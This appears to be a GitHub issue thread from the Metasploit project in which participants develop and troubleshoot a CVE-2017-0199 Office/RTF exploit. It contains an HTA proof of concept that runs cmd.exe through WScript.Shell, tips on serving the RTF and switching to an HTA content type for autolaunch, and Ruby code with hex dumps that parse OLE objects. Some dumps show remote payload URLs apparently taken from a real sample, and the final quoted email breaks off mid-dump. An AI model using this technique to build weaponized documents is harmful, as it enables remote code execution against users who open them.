Closed nixawk closed 7 years ago
If regedit shows as
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\CLSID\{00000300-0000-0000-C000-000000000046}\InprocServer32]
@="ole32.dll"
poc.rtf
<script>
a=new ActiveXObject("WScript.Shell");
a.run('%windir%\\System32\\cmd.exe /c calc.exe', 0);window.close();
</script>
windows fails to execute payload. StdOleLink is the key.
Have you got it working?
I host RTF and autolink then switch to HTA with application content type. Works fine this way.
Autolaunch too
@vysec Could you show more details about your lab and office ver ? I've tested it on windows 7 Ultimate (not sp1) with office 2010, but failed.
If windows 7 sp1, everything goes well.
https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html
Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Microsoft Office 2007 Service Pack 3 Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) Windows Server 2012 Windows Server 2012 (Server Core installation) Microsoft Office 2010 Service Pack 2 (32-bit editions) Microsoft Office 2010 Service Pack 2 (64-bit editions) Microsoft Office 2013 Service Pack 1 (32-bit editions) Microsoft Office 2013 Service Pack 1 (64-bit editions) Microsoft Office 2016 (32-bit edition) Microsoft Office 2016 (64-bit edition) Windows Vista Service Pack 2 Windows Server 2008 for Itanium-Based Systems Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Vista x64 Edition Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
OK works fine now :)
Some "technical reports" are there are reporting false samples... Not every random OLE2Link is the 1 day. There's a 0day technique out there to bypass some prompts / measures but the 1day in question isn't what's displayed in some of the reports as the payloads not even correct...
Is there a way to create a vulnerable docx with metasploit ?
modules/exploits/windows/fileformat/office_word_macro.rb creates malicious .docx files, it just tweaks xml and zips it up.
I'll have a look after work
On Thu, 13 Apr 2017 at 03:13, Brent Cook notifications@github.com wrote:
modules/exploits/windows/fileformat/office_word_macro.rb creates malicious .docx files, it just tweaks xml and zips it up.
— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub https://github.com/rapid7/metasploit-framework/issues/8220#issuecomment-293757634, or mute the thread https://github.com/notifications/unsubscribe-auth/ADbf0puJjSqNi4DibbCg3ji5jfLDM1urks5rvYTJgaJpZM4M5lMa .
I've created a rb to parse ole object bin as follow. Could anyone show me how to parse data = ministream.instance_variable_get(:@data) ? Is there a format link for data ? How to create a new data to replace it ?
https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf
*** ministream (384 bytes):
{
sid => 0x0,
_ab => "Root Entry", # Directory Entry Name
_cb => 0x0016, # Directory Entry Name Length
_mse => 0x02, # Object Type
_bflags => 0x00, # Color Flag
_sidLeftSib => 0xffffffff, # Left Sibling ID
_sidRightSib => 0xffffffff, # Right Sibling ID
_sidChild => 0xffffffff, # Child ID
_clsId => 00000000-0000-0000-0000-000000000000, # CLSID
_dwUserFlags => 0x00000000, # State Flags
_ctime => 00 00 00 00 00 00 00 00 |........| # Creation Time
_mtime => 00 00 00 00 00 00 00 00 |........| # Modification Time
_sectStart => 0xfffffffe, # Starting Sector Location
_ulSize => 0x0000000000000180, # Stream Size
data =>
01 00 00 02 09 00 00 00 01 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 6e 00 00 00 e0 c9 ea 79 |........n......y|
f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 56 00 00 00 |.........K..V...|
68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 31 00 |h.t.t.p.:././.1.|
39 00 32 00 2e 00 31 00 36 00 38 00 2e 00 32 00 |9.2...1.6.8...2.|
30 00 36 00 2e 00 31 00 34 00 34 00 2f 00 70 00 |0.6...1.4.4./.p.|
6f 00 63 00 2e 00 72 00 74 00 66 00 00 00 79 58 |o.c...r.t.f...yX|
81 f4 3b 1d 7f 48 af 2c 82 5d c4 85 27 63 00 00 |..;..H.,.]..'c..|
00 00 a5 ab 00 00 ff ff ff ff 06 09 02 00 00 00 |................|
00 00 c0 00 00 00 00 00 00 46 00 00 00 00 ff ff |.........F......|
ff ff 00 00 00 00 00 00 00 00 e0 81 81 54 cb b4 |.............T..|
d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
10 00 03 00 0d 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
1e 00 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 |..http://192.168|
2e 32 30 36 2e 31 34 34 2f 70 6f 63 2e 72 74 66 |.206.144/poc.rtf|
00 00 bb bb cc cc 1e 00 68 00 74 00 74 00 70 00 |........h.t.t.p.|
3a 00 2f 00 2f 00 31 00 39 00 32 00 2e 00 31 00 |:././.1.9.2...1.|
36 00 38 00 2e 00 32 00 30 00 36 00 2e 00 31 00 |6.8...2.0.6...1.|
34 00 34 00 2f 00 70 00 6f 00 63 00 2e 00 72 00 |4.4./.p.o.c...r.|
74 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 |t.f.............|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
}
require 'ole/storage'
require 'rex/ole'
filename = 'test.doc_object_000001BC.bin'
# ole/storage
ole = Ole::Storage.open(filename, 'rb+')
puts ole.dirents.length
puts ole.root.to_tree
# rex/ole
ole = Rex::OLE::Storage.new(filename, Rex::OLE::STGM_READ)
ministream = ole.instance_variable_get(:@ministream)
data = ministream.instance_variable_get(:@data)
olebin = ::File.open('ole-ministream.bin', 'wb+')
olebin.write(data)
olebin.close
CVE-2017-0199 ->> ruby read_ole.rb
From: /Users/nixawk/Desktop/CVE-2017-0199/read_ole.rb @ line 19 :
14: require 'rex/ole'
15: ole = Rex::OLE::Storage.new(filename, Rex::OLE::STGM_READ)
16: ministream = ole.instance_variable_get(:@ministream)
17: # puts ministream.instance_variable_get(:@data)
18:
=> 19: binding.pry
[1] pry(main)> ministream
=> #<Rex::OLE::Stream:0x007fc37584de48
@_ab="Root Entry",
@_bflags=0,
@_cb=nil,
@_clsId=#<Rex::OLE::CLSID:0x007fc37584ddd0 @buf="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00">,
@_ctime="\x00\x00\x00\x00\x00\x00\x00\x00",
@_dwUserFlags=0,
@_mse=2,
@_mtime="\x00\x00\x00\x00\x00\x00\x00\x00",
@_sectStart=4294967294,
@_sidChild=4294967295,
@_sidLeftSib=4294967295,
@_sidRightSib=4294967295,
@_ulSize=512,
@children=[],
@data=
"\x01\x00\x00\x02\t\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\\x01\x00\x00\xE0\xC9\xEAy\xF9\xBA\xCE\x11\x8C\x82\x00\xAA\x00K\xA9\vD\x01\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00h\x00y\x00o\x00e\x00y\x00e\x00e\x00p\x00.\x00w\x00s\x00/\x00t\x00e\x00m\x00p\x00l\x00a\x00t\x00e\x00.\x00d\x00o\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00yX\x81\xF4;\x1D\x7FH\xAF,\x82]\xC4\x85'c\x00\x00\x00\x00\xA5\xAB\x00\x00\xFF\xFF\xFF\xFF i3%\xF9\x03\xCF\x11\x8F\xD0\x00\xAA\x00ho\x13\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x03\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
@offset=0,
@sid=0,
@stg=
header = {
_abSig => "\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1",
_clid => 00000000-0000-0000-0000-000000000000,
_uMinorVersion => 0x003e,
_uMajorVersion => 0x0003,
_uByteOrder => 0xfffe,
_uSectorShift => 0x0009,
_uMiniSectorShift => 0x0006,
_csectDir => 0x00000000,
_csectFat => 0x00000001,
_sectDirStart => 0x00000001,
_signature => 0x00000000,
_uMiniSectorCutoff => 0x00001000,
_sectMiniFatStart => 0x00000002,
_csectMiniFat => 0x00000001,
_sectDifStart => 0xfffffffe,
_csectDif => 0x00000000
}
*** 109 DIFAT sectors
{ 0x0, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE }
*** 128 FAT sectors
{ FAT, END, END, END, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE }
*** 128 MiniFAT sectors:
{ 0x1, 0x2, 0x3, 0x4, 0x5, 0x6, END, END, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE }
*** ministream (512 bytes):
{
sid => 0x0,
_ab => "Root Entry",
_cb => 0x0016,
_mse => 0x02,
_bflags => 0x00,
_sidLeftSib => 0xffffffff,
_sidRightSib => 0xffffffff,
_sidChild => 0xffffffff,
_clsId => 00000000-0000-0000-0000-000000000000,
_dwUserFlags => 0x00000000,
_ctime => 00 00 00 00 00 00 00 00 |........|
_mtime => 00 00 00 00 00 00 00 00 |........|
_sectStart => 0xfffffffe,
_ulSize => 0x0000000000000200,
data =>
01 00 00 02 09 00 00 00 01 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 5c 01 00 00 e0 c9 ea 79 |........\......y|
f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 44 01 00 00 |.........K..D...|
68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 68 00 |h.t.t.p.:././.h.|
79 00 6f 00 65 00 79 00 65 00 65 00 70 00 2e 00 |y.o.e.y.e.e.p...|
77 00 73 00 2f 00 74 00 65 00 6d 00 70 00 6c 00 |w.s./.t.e.m.p.l.|
61 00 74 00 65 00 2e 00 64 00 6f 00 63 00 00 00 |a.t.e...d.o.c...|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 79 58 81 f4 |............yX..|
3b 1d 7f 48 af 2c 82 5d c4 85 27 63 00 00 00 00 |;..H.,.]..'c....|
a5 ab 00 00 ff ff ff ff 20 69 33 25 f9 03 cf 11 |........ i3%....|
8f d0 00 aa 00 68 6f 13 00 00 00 00 ff ff ff ff |.....ho.........|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
10 00 03 00 04 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
}
*** 3 directory entries
{
sid => 0x0,
_ab => "Root Entry",
_cb => 0x0016,
_mse => 0x05,
_bflags => 0x00,
_sidLeftSib => 0xffffffff,
_sidRightSib => 0xffffffff,
_sidChild => 0x00000001,
_clsId => 00000300-0000-0000-c000-000000000046,
_dwUserFlags => 0x00000000,
_ctime => 00 00 00 00 00 00 00 00 |........|
_mtime => 10 4e ab 9b 42 49 d2 01 |.N..BI..|
_sectStart => 0x00000003,
_ulSize => 0x0000000000000200,
*children* =>
{
sid => 0x1,
_ab => "\x01Ole",
_cb => 0x000a,
_mse => 0x02,
_bflags => 0x01,
_sidLeftSib => 0xffffffff,
_sidRightSib => 0x00000002,
_sidChild => 0xffffffff,
_clsId => 00000000-0000-0000-0000-000000000000,
_dwUserFlags => 0x00000000,
_ctime => 00 00 00 00 00 00 00 00 |........|
_mtime => 00 00 00 00 00 00 00 00 |........|
_sectStart => 0x00000000,
_ulSize => 0x00000000000001a8,
data =>
--NOT OPENED YET--
}
{
sid => 0x2,
_ab => "\x03ObjInfo",
_cb => 0x0012,
_mse => 0x02,
_bflags => 0x00,
_sidLeftSib => 0xffffffff,
_sidRightSib => 0xffffffff,
_sidChild => 0xffffffff,
_clsId => 00000000-0000-0000-0000-000000000000,
_dwUserFlags => 0x00000000,
_ctime => 00 00 00 00 00 00 00 00 |........|
_mtime => 00 00 00 00 00 00 00 00 |........|
_sectStart => 0x00000007,
_ulSize => 0x0000000000000006,
data =>
--NOT OPENED YET--
}
}
>
So I applied the patch... but the machine is still vulnerable... ???
On Fri, Apr 14, 2017 at 9:58 AM, Vex Woo notifications@github.com wrote:
Prase ole object
require 'rex/ole' require 'pry'
filename = 'ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e.bin_object_00003181.bin'
ole = Rex::OLE::Storage.new(filename, Rex::OLE::STGM_READ) ministream = ole.instance_variable_get(:@ministream)
puts ministream.instance_variable_get(:@data)
binding.pry
CVE-2017-0199 ->> ruby read_ole.rb
From: /Users/nixawk/Desktop/CVE-2017-0199/read_ole.rb @ line 19 :
14: require 'rex/ole' 15: ole = Rex::OLE::Storage.new(filename, Rex::OLE::STGM_READ) 16: ministream = ole.instance_variable_get(:@ministream) 17: # puts ministream.instance_variable_get(:@data) 18:
=> 19: binding.pry
[1] pry(main)> ministream => #<Rex::OLE::Stream:0x007fc37584de48 @_ab="Root Entry", @_bflags=0, @_cb=nil, @_clsId=#<Rex::OLE::CLSID:0x007fc37584ddd0 @buf="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00">, @_ctime="\x00\x00\x00\x00\x00\x00\x00\x00", @_dwUserFlags=0, @_mse=2, @_mtime="\x00\x00\x00\x00\x00\x00\x00\x00", @_sectStart=4294967294, @_sidChild=4294967295, @_sidLeftSib=4294967295, @_sidRightSib=4294967295, @_ulSize=512, @children=[], @data= "\x01\x00\x00\x02\t\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\x01\x00\x00\xE0\xC9\xEAy\xF9\xBA\xCE\x11\x8C\x82\x00\xAA\x00K\xA9\vD\x01\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00h\x00y\x00o\x00e\x00y\x00e\x00e\x00p\x00.\x00w\x00s\x00/\x00t\x00e\x00m\x00p\x00l\x00a\x00t\x00e\x00.\x00d\x00o\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00yX\x81\xF4;\x1D\x7FH\xAF,\x82]\xC4\x85'c\x00\x00\x00\x00\xA5\xAB\x00\x00\xFF\xFF\xFF\xFF i3%\xF9\x03\xCF\x11\x8F\xD0\x00\xAA\x00ho\x13\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x03\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", @offset=0, @sid=0, @stg= header = { _abSig => "\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", _clid => 00000000-0000-0000-0000-000000000000, _uMinorVersion => 0x003e, _uMajorVersion => 0x0003, _uByteOrder => 0xfffe, _uSectorShift => 0x0009, _uMiniSectorShift => 0x0006, _csectDir => 0x00000000, _csectFat => 0x00000001, _sectDirStart => 0x00000001, _signature => 0x00000000, _uMiniSectorCutoff => 0x00001000, _sectMiniFatStart => 0x00000002, _csectMiniFat => 0x00000001, _sectDifStart => 0xfffffffe, _csectDif => 0x00000000 } 109 DIFAT sectors { 0x0, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE } 128 FAT sectors { FAT, END, END, END, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE } 128 MiniFAT sectors: { 0x1, 0x2, 0x3, 0x4, 0x5, 0x6, END, END, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE, FREE } ministream (512 bytes): { sid => 0x0, _ab => "Root Entry", _cb => 0x0016, _mse => 0x02, _bflags => 0x00, _sidLeftSib => 0xffffffff, _sidRightSib => 0xffffffff, _sidChild => 0xffffffff, _clsId => 00000000-0000-0000-0000-000000000000, _dwUserFlags => 0x00000000, _ctime => 00 00 00 00 00 00 00 00 |........| _mtime => 00 00 00 00 00 00 00 00 |........| _sectStart => 0xfffffffe, _ulSize => 0x0000000000000200, data => 01 00 00 02 09 00 00 00 01 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 5c 01 00 00 e0 c9 ea 79 |..............y| f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 44 01 00 00 |.........K..D...| 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 68 00 |h.t.t.p.:././.h.| 79 00 6f 00 65 00 79 00 65 00 65 00 70 00 2e 00 |y.o.e.y.e.e.p...| 77 00 73 00 2f 00 74 00 65 00 6d 00 70 00 6c 00 |w.s./.t.e.m.p.l.| 61 00 74 00 65 00 2e 00 64 00 6f 00 63 00 00 00 |a.t.e...d.o.c...| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 79 58 81 f4 |............yX..| 3b 1d 7f 48 af 2c 82 5d c4 85 27 63 00 00 00 00 |;..H.,.]..'c....| a5 ab 00 00 ff ff ff ff 20 69 33 25 f9 03 cf 11 |........ i3%....| 8f d0 00 aa 00 68 6f 13 00 00 00 00 ff ff ff ff |.....ho.........| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 10 00 03 00 04 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| } ** 3 directory entries { sid => 0x0, _ab => "Root Entry", _cb => 0x0016, _mse => 0x05, _bflags => 0x00, _sidLeftSib => 0xffffffff, _sidRightSib => 0xffffffff, _sidChild => 0x00000001, _clsId => 00000300-0000-0000-c000-000000000046, _dwUserFlags => 0x00000000, _ctime => 00 00 00 00 00 00 00 00 |........| _mtime => 10 4e ab 9b 42 49 d2 01 |.N..BI..| _sectStart => 0x00000003, _ulSize => 0x0000000000000200, children* => { sid => 0x1, _ab => "\x01Ole", _cb => 0x000a, _mse => 0x02, _bflags => 0x01, _sidLeftSib => 0xffffffff, _sidRightSib => 0x00000002, _sidChild => 0xffffffff, _clsId => 00000000-0000-0000-0000-000000000000, _dwUserFlags => 0x00000000, _ctime => 00 00 00 00 00 00 00 00 |........| _mtime => 00 00 00 00 00 00 00 00 |........| _sectStart => 0x00000000, _ulSize => 0x00000000000001a8, data => --NOT OPENED YET-- } { sid => 0x2, _ab => 